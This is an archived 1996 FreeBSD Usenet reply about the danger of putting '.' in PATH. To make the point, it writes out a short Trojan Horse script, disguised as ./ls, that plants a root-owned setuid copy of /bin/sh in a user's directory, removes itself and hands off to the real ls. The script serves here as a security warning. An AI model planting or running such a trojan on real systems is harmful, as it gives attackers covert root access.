Return to BSD News archive
Path: euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!news.bhp.com.au!mel.dit.csiro.au!munnari.OZ.AU!news.ecn.uoknor.edu!news.cis.okstate.edu!news.ksu.ksu.edu!news.physics.uiowa.edu!math.ohio-state.edu!howland.reston.ans.net!gatech!newsfeed.internetmci.com!in1.uu.net!nwnews.wa.com!nwfocus.wa.com!ender.techcenter.paccar.com!news From: Will Kempf <wkempf@paccar.com> Newsgroups: comp.unix.bsd.freebsd.misc Subject: Re: Problem with g++ compiled program output Date: Tue, 23 Jan 1996 09:54:54 -0800 Organization: PACCAR Information Systems Lines: 26 Message-ID: <310520EE.1918@paccar.com> References: <17JAN199620510552@rosie.uh.edu> <31017E15.41C67EA6@FreeBSD.org> <DLLAur.Fs3.0.macbeth@cogsci.ed.ac.uk> NNTP-Posting-Host: wkempf.misrenton.paccar.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 2.0b6a (WinNT; I) Richard Tobin wrote: > > In article <31017E15.41C67EA6@FreeBSD.org> "Jordan K. Hubbard" <jkh@FreeBSD.org> writes: > >A common new user error. You're now running /bin/test. Try ./test to > >run your version instead. > > I once knew a system manager who was writing a program called > "disk-backup", little realising that there was an existing program of > the same name that did disk-to-disk copies. He trashed the user > filesystem three times before he found out.... > > Moral: always put dot at the start of your path, especially if you're > root :-) > That's right: make it *really* easy for your users to install a classic Trojan Horse in some directory... e.g. a file called ./ls cp /bin/sh ~sneaky_user/bin/magic chown root ~sneaky_user/bin/magic chmod 4700 ~sneaky_user/bin/magic rm -f ./ls /bin/ls $* exit 0